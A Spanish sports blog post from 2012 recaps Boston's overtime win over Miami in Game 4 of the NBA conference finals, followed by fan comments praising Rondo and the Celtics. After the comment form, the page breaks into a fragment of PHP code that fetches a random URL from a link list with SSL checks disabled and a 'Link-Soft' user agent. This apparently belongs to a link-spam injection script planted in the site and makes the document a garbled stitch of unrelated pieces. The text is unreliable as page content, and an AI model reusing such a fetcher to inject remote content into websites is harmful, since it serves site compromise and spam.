La Crónica: Efecto Leprechaun

04 de June de 2012 por txusma

Al famoso axioma de “Nunca subestimes el corazón del campeón” habría que añadir una variante: “Nunca subestimes el poder del Boston Garden”. ¿Cuántas veces se ha dado la vuelta a la tortilla en aquel mítico escenario independientemente de las dificultades y desventajas aparentes? ¿Quién niega que el bastión de los Celtics no es un protagonista más de sus éxitos? Tan decisivo como los Auerbach, Russell, Havlicek o Bird…

Ayer los Heat tuvieron la victoria en sus manos en un par de ocasiones, y con ella, casi con total seguridad, la serie. Se llegaba a los instantes finales con empate a 89, después de que incomprensiblemente la defensa céltica hubiera dejado completamente solo a LeBron para que embocara un triple.

<Acto1: Se masca la tragedia>

Falta en ataque de Garnett a LeBron a falta de 21″. Lo que en otros lugares provocaría miedo en el cuerpo y silencio sepulcral convertía el Garden en un infierno. La parroquia echaba el resto la noche que quizás podía tener lugar la última cabalgada de su “Big Three” al completo. La repetición en el vídeomarcador no hacía otra cosa que aumentar el volumen de decibelios. LeBron no se atrevía ni a tirar en lo que quedaba, postponiendo la resolución a la prórroga. En un equipo con LeBron y Wade el buzzer beater se lo juega… Udonis Haslem.

<Acto2: El extraño humor del duende>

Al poco de comenzar el periodo extra expulsión de Pierce por faltas. El máximo anotador verde. Un par de minutos después le ocurría al mismísimo LeBron, por primera vez en toda su carrera como Heat.

“I don’t ever think I’ve seen that before,” Allen said of James and Pierce fouling out. “But Rondo’s on the floor, I’m on the floor, Kevin’s on the floor, Wade’s on the floor. All that has to happen at that point is the game has to be won. We don’t care what it looks like. We had plenty.”

<Acto3: Wade y los fantasmas del Garden>

Con dos abajo en el marcador le llega el balón a Dwane Wade. Bloqueo y se libra de la marca de Rondo, mano a mano contra Daniels. Finta que se traga el defensor y encuentra hueco para lanzar solo el triple de la victoria.

“Red wasn’t going to let that go in. Not in the Boston Garden.”

Según Doc Rivers fue el espíritu de Red Auerbach quien impidió a Wade ganar el choque.

A los Heat ahora les queda una visita más al Garden. Por su propio bien que no sea en contexto de vida o muerte para ellos.

PREMIOS

MVP: Rajon Rondo repartió 15 asistencias y anotó 15 puntos, 3 de ellos en la prórroga. El “Big Three” aprovechó a la perfección sus pases y acabaron todos con buenos números anotadores.

Sorpresa: Salió de titular Joel Anthony pero el que se salió fue Udonis Haslem. 12 puntos y 17 rebotes para un jugador mucho más importante de lo que parece en los Heat, al menos hasta que vuelva Chris Bosh. 

Esfuerzo en vano: Dwyane Wade comenzó el partido muy mal pero lo acabó arreglando en la 2ª parte. Al final fueron 20 puntos, 7 rebotes, 6 asistencias, 3 robos y 3 tapones.

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. nba dice:
    #1

    Como Lebron tarde mucho en ganar su anillo , me da a mi que , el año que los Thunder sean capaces de llegar a la final de la NBA no va a haber nadie que sean capaces de toserles .
    Veis alguna posibilidad de que Pau acabe en los Celtics, lo digo porque que vben estaría que compartiese vestuario con Garnett y asi igual se le pegaba un poco del caracter de este …, porque que GRANDES los tiene.

      Citar

  2. GreenPride dice:
    #2

    Grandes de nuevo los Celtics. Nunca dejará de sorprenderme este equipo. Partido típico de PO en la conferencia Este en la segunda mitad. Pero empezemos por el principio.
    De salida Spoelstra movió pieza en su quinteto sacando de inicio a Anthony por Turiaf. La misión estaba clara, era necesario meter más defensa sobre Garnett. Sin embargo, los Celtics de la mano de Rondo y con todos sus jugadores anotando salieron como una bala construyendo muy rápido una ventaja de 15 puntos (21-6). A partir de aquí y hasta el tercer cuarto el partido fue una sucesión de tirones de uno y otro equipo pero siempre con Boston comandando claramente el marcador con ventajas entre 8 y 18 puntos. En ese tiempo los Celtics movían el balón fenomenal y encontraban tiros abiertos para casi todos e incluso se encontraban a un Ray Allen muy mejorado respecto al resto de la serie. Boston llevaba claramente la iniciativa y los Heat iban sobreviviendo gracias como siempre a LeBron y algunos destellos de Wade y el trabajo de Chalmers, al descanso +14 para Boston y 61 puntos anotados.
    En la segunda mitad, ajustaron los Heat su defensa, empezaron a pesar las piernas en los Celtics y los Heat con un Wade bastante mejorado y Haslem haciendo daño en el rebote consiguieron igualar el partido y ponerse por delante. A partir de ahí guerra de nervios con los dos equipos cargándose de faltas y muchas dificultades por las dos partes para sumar puntos. Guerra de guerrillas por todos lados y partido que se iba a decidir en las jugadas finales. Y ahí los Heat perdieron la oportunidad de cerrar el partido en el tiempo reglamentario. ¿Adivinan quién fallo de nuevo el tiro final? Pues esta vez no fue LeBron que se quitó el balón de enmedio para darle un melón a Haslem cuyo tiro no estuvo ni cerca. La capacidad de LeBron para ganar partidos en los últimos lanzamientos sigue muy en entredicho en esta eliminatoria
    Después en la prórroga, sangre y sudor para anotar. 4-2 para Boston con una sóla canasta por equipo, los Heat no sumaron nada en los últimos 3:30. Para entonces Pierce y LeBron habían sido eliminados por sendas faltas en ataque que no parecieron ninguna de las 2 y Pietrus se llevó un par de rebotes ofensivos clave en el último minuto. Y con estas, última posesión para los Heat, con dos abajo tras fallar Rondo uno de los dos tiros libres que tuvo. Como no estaba LeBron, balón a Wade, que finta la defensa de Marquis y se queda con un triple frontal para ganar aunque con una postura no muy cómoda. Fallo de Wade y empate a 2 en la serie.
    La verdad es que uno ya no sabe que pensar. ¿Podrán de verdad los Celtics ganar esta serie? Ahora a los Heat se les viene toda la presión encima para el 5º partido en casa. Para mí siguen siendo favoritos, pero la defensa de Boston está consiguiendo parar durante muchas fases de los partidos a Wade y aunque este está siendo inteligente para no forzar a los Heat les cuesta mucho anotar. Además están apareciendo jugadores con los que no se contaba como Dooling o Daniels que están ayudando bastante a los Celtics, Garnett sigue dominando la pintura aunque esta vez hicieron mejor trabajo defensivo con él y Pierce y Allen van aportando con un Ray bastante mejorado y por encima de todos un fantástico Rondo que anota y asiste a partes iguales y que hace jugar a todo el equipo. Cuando Boston tiene fluidez ofensiva sacan mucha ventaja pero suelen atascarse en fases de los partidos. Sin duda, en partidos decididos en las últimas jugadas creo que Boston puede tener ventajas ya que Doc es un maestro y además tienen varias opciones para el lanzamiento final. En los Heat el plan siempre parece dársela a LeBron y que se la juegue (si no está a Wade), esto les hace más previsibles y además es de sobra conocido que LeBron no es el mejor del mundo en tiros sobre la bocina.
    Ahora la serie vuelve a Miami donde espera un 5º probablemente agónico. Los Celtics necesitarán que su ataque funcione como en la primera parte para ganar ya que en Miami el arbitraje probablemente no les dejará ser tan duros en defensa con Wade y LeBron. Si consiguen llegar al cara o cruz final pueden tener su opción de llevarse el partido y la serie aunque yo creo que los Heat saldrán a muerte y dudo que se dejen robar la cartera. ¿Volverá Chris Bosh para el 5º? Sin duda su presencia podría ser decisiva en el tramo final de la serie. Sea como sea lo que es seguro es que los Celtics harán sudar tinta a los Heat para pasar a las Finales, cosa que muchos no esperaban.
    Totalmente de acuerdo con la crónica en que el Garden juega un factor en cada serie de los de Boston y en que los Heat por su bien más les vale ganar el 5º y no jugar en el “infierno verde” jugándose la vida en el 6º. Toda la presión para LeBron y sus Heat, obligadísimos por estos Celtics que aún muertos tiran de orgullo cada partido y les están poniendo las cosas complicadísimas. Incluso en estos partidos en Boston parecen algo menos cansados, quién lo diría…. Go Celtics!!!

      Citar

  3. Nacho dice:
    #3

    Rondo, finales de conferencia: 24 puntos, 10’5 asistencias, 7 rebotes. Importante en los minutos calientes. ¿Qué más tiene que hacer el muchacho para ser considerado un grande?
    Y liderando a un equipo que casi todo el mundo daba por muerto mucho antes.

    nba:
    Como Lebron tarde mucho en ganar su anillo , me da a mi que , el año que los Thunder sean capaces de llegar a la final de la NBA no va a haber nadie que sean capaces de toserles .
    Veis alguna posibilidad de que Pau acabe en los Celtics, lo digo porque que vben estaría que compartiese vestuario con Garnett y asi igual se le pegaba un poco del caracter de este …, porque que GRANDES los tiene.

    Lo de Pau no lo veo, a no ser que en LA quieran a Stiemsma, Dooling y Hollins (que capaces son)

      Citar

  4. nba dice:
    #4

    Lo de Pau no lo veo, a no ser que en LA quieran a Stiemsma, Dooling y Hollins (que capaces son)

    Pues yo firmaba el trade ahora mismo, y sobre todo viendo las ultimas declaraciones de Buss

      Citar

  5. rumbero dice:
    #5

    Nacho:
    Rondo, finales de conferencia: 24 puntos, 10’5 asistencias, 7 rebotes. Importante en los minutos calientes. ¿Qué más tiene que hacer el muchacho para ser considerado un grande?
    Y liderando a un equipo que casi todo el mundo daba por muerto mucho antes.

    Lo de este señor es muy grande. La sensación de dominio y incidencia que tiene en el equipo va más allá de cualquier estadísitica. A mi estos verdes me tienen ganado y es en gran parte por su culpa.
    Y esto se pone interesante señores! Esta vez el poder del Garden evitó un 3-1 como el año pasado y ahora toda la presión va para Miami. Les basta con hacer sus deberes en el AAA, pero sabiendo que no pueden pinchar y que los verdes les van a apretar de lo lindo. Deberían seguir siendo favoritos, más si cuentan con Bosh ya para el próximo, pero yo esto quiero verlo. Los verdes han ajustado mejor la defensa evitando tanta transición, Dooling-Daniels-Pietrus no son el Big Three, pero han dado buenos minutos en estos dos partidos y deberán seguir haciéndolo. Y Pierce y Allen no parecen tan cascados como al inicio de las finales. Igual todos estos factores solo se dan con los aires de Boston, pero sigo teniendo alguna esperanza que puedan darles un susto en Miami. Buena ocasión también para ver como responde el King en este vital Game5

      Citar

  6. Nacho dice:
    #6

    rumbero: Lo de este señor es muy grande. La sensación de dominio y incidencia que tiene en el equipo va más allá de cualquier estadísitica. A mi estos verdes me tienen ganado y es en gran parte por su culpa

    Yo he sido de Lakers de jovencito, porque jugaba un tal Magic, y ese rubio blanquito desgarbado de verde, pues me caía mal. Ahora ya cascado, lo de ser de un equipo pasa a ser secundario. Voy con quien me hace disfrutar. Y por mucho que quede algo de ese rencor anticéltico, ver a Rondo hace cambiar la perspectiva. También Doc hace lo suyo, y ver lo que hacen estos cojos divinos…

      Citar

  7. Tobal dice:
    #7

    Qué mérito tienen estos Celtics,cuando muchos no daban un duro por ellos,ahí siguen dando lecciones a sus rivales,creo que pueden ganar en Miami,si logran parar a Lebron o bien a Wade,les doy posibilidades,ojalá pasen.Y luego está el tema de Rondo,que para mí es un jugadorazo,sus números en esta serie son tremendos,anota ,reparte juego,rebotea,penetra a canasta,marca el tempo de partido,en fin que casi todo lo hace bién,va camino de ser un jugador de leyenda.

      Citar

  8. Lucho dice:
    #8

    Lamento decir siempre lo mismo, pero que placer ver jugar a Rondo.. CRACKKKKKK

      Citar

  9. jose antonio ramirez dice:
    #9

    GreenPride:
    Grandes de nuevo los Celtics. Nunca dejará de sorprenderme este equipo. Partido típico de PO en la conferencia Este en la segunda mitad. Pero empezemos por el principio.
    De salida Spoelstra movió pieza en su quinteto sacando de inicio a Anthony por Turiaf. La misión estaba clara, era necesario meter más defensa sobre Garnett. Sin embargo, los Celtics de la mano de Rondo y con todos sus jugadores anotando salieron como una bala construyendo muy rápido una ventaja de 15 puntos (21-6). A partir de aquí y hasta el tercer cuarto el partido fue una sucesión de tirones de uno y otro equipo pero siempre con Boston comandando claramente el marcador con ventajas entre 8 y 18 puntos. En ese tiempo los Celtics movían el balón fenomenal y encontraban tiros abiertos para casi todos e incluso se encontraban a un Ray Allen muy mejorado respecto al resto de la serie. Boston llevaba claramente la iniciativa y los Heat iban sobreviviendo gracias como siempre a LeBron y algunos destellos de Wade y el trabajo de Chalmers, al descanso +14 para Boston y 61 puntos anotados.
    En la segunda mitad, ajustaron los Heat su defensa, empezaron a pesar las piernas en los Celtics y los Heat con un Wade bastante mejorado y Haslem haciendo daño en el rebote consiguieron igualar el partido y ponerse por delante. A partir de ahí guerra de nervios con los dos equipos cargándose de faltas y muchas dificultades por las dos partes para sumar puntos. Guerra de guerrillas por todos lados y partido que se iba a decidir en las jugadas finales. Y ahí los Heat perdieron la oportunidad de cerrar el partido en el tiempo reglamentario. ¿Adivinan quién fallo de nuevo el tiro final? Pues esta vez no fue LeBron que se quitó el balón de enmedio para darle un melón a Haslem cuyo tiro no estuvo ni cerca. La capacidad de LeBron para ganar partidos en los últimos lanzamientos sigue muy en entredicho en esta eliminatoria
    Después en la prórroga, sangre y sudor para anotar. 4-2 para Boston con una sóla canasta por equipo, los Heat no sumaron nada en los últimos 3:30. Para entonces Pierce y LeBron habían sido eliminados por sendas faltas en ataque que no parecieron ninguna de las 2 y Pietrus se llevó un par de rebotes ofensivos clave en el último minuto. Y con estas, última posesión para los Heat, con dos abajo tras fallar Rondo uno de los dos tiros libres que tuvo. Como no estaba LeBron, balón a Wade, que finta la defensa de Marquis y se queda con un triple frontal para ganar aunque con una postura no muy cómoda. Fallo de Wade y empate a 2 en la serie.
    La verdad es que uno ya no sabe que pensar. ¿Podrán de verdad los Celtics ganar esta serie? Ahora a los Heat se les viene toda la presión encima para el 5º partido en casa. Para mí siguen siendo favoritos, pero la defensa de Boston está consiguiendo parar durante muchas fases de los partidos a Wade y aunque este está siendo inteligente para no forzar a los Heat les cuesta mucho anotar. Además están apareciendo jugadores con los que no se contaba como Dooling o Daniels que están ayudando bastante a los Celtics, Garnett sigue dominando la pintura aunque esta vez hicieron mejor trabajo defensivo con él y Pierce y Allen van aportando con un Ray bastante mejorado y por encima de todos un fantástico Rondo que anota y asiste a partes iguales y que hace jugar a todo el equipo. Cuando Boston tiene fluidez ofensiva sacan mucha ventaja pero suelen atascarse en fases de los partidos. Sin duda, en partidos decididos en las últimas jugadas creo que Boston puede tener ventajas ya que Doc es un maestro y además tienen varias opciones para el lanzamiento final. En los Heat el plan siempre parece dársela a LeBron y que se la juegue (si no está a Wade), esto les hace más previsibles y además es de sobra conocido que LeBron no es el mejor del mundo en tiros sobre la bocina.
    Ahora la serie vuelve a Miami donde espera un 5º probablemente agónico. Los Celtics necesitarán que su ataque funcione como en la primera parte para ganar ya que en Miami el arbitraje probablemente no les dejará ser tan duros en defensa con Wade y LeBron. Si consiguen llegar al cara o cruz final pueden tener su opción de llevarse el partido y la serie aunque yo creo que los Heat saldrán a muerte y dudo que se dejen robar la cartera. ¿Volverá Chris Bosh para el 5º? Sin duda su presencia podría ser decisiva en el tramo final de la serie. Sea como sea lo que es seguro es que los Celtics harán sudar tinta a los Heat para pasar a las Finales, cosa que muchos no esperaban.
    Totalmente de acuerdo con la crónica en que el Garden juega un factor en cada serie de los de Boston y en que los Heat por su bien más les vale ganar el 5º y no jugar en el “infierno verde” jugándose la vida en el 6º. Toda la presión para LeBron y sus Heat, obligadísimos por estos Celtics que aún muertos tiran de orgullo cada partido y les están poniendo las cosas complicadísimas. Incluso en estos partidos en Boston parecen algo menos cansados, quién lo diría…. Go Celtics!!!

    Que te dije hombre de poca fe, los orgullosos son mucho. Sabia que se pondrian 2-2 y lo mas importante, la serie SE VA A GANAR. Por los huevos de garnett, rondo, pierce, allen, auberbach, rivers y el garden. Porque son muy superiores y porque vamos a vivir unas finales de nuevo.

      Citar

  10. Sancho88 dice:
    #10

    Una clave que es importante, además de las meadas que se está pegando Garnett contra los pobrecicos pivotes miamenses, es precisamente los descansos del propio Garnett. En los dos primeros juegos Boston se atascaba en estas circunstancias, pero ahora Rivers puede estar tranquilo porque está apareciendo con mucha solvencia Brandon Bass con su gran mano a 5 metros, además del espíritu de Daniels jugando como 4 en algunos momentos. Grande la defensa que está haciendo este tipo, grandes los triples de Dooling y desde luego, estos viejos nos han conquistado a todos. Miami favoritísimo aún, pero esta serie huele claramente a séptimo partido. Por ponerles un pero a estos grandiosos Celtics, creo que deben ser si cabe más intensos, sobre todo en la defensa sobre Chalmers. A ese tío no le puedes dejar tirar porque va mucho por rachas, y en el cuarto partido se vio, que junto a Wade y Lebron, entre los tres estuvieron a punto de finiquitar prácticamente la serie.

    Y un último apunte: Ray Allen. Lo que tiene que estar sufriendo este señor solo lo sabe él, con los dos tobillos destrozados y con la pinta de que al día siguiente de salir eliminados o con el trofeo dorado en las manos (con estos tíos nunca se sabe) le operarán. Qué delicia verle jugar, se está esforzando al máximo, igual que Pietrus. Esos tres hombres, Dooling+Daniels+Pietrus tienen el orgullo céltico en la sangre y lo están demostrando. Bass como comodín y lógicamente el big four con la máxima importancia. Eso suma un total de 8 hombres aportando atrás y adelante. Esa es la fórmula secreta del baloncesto de toda la vida, rotación de 7-8 hombres clave y que todos aporten. Me encantaría que el epílogo de estos señores durase hasta el final, se lo merecen

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>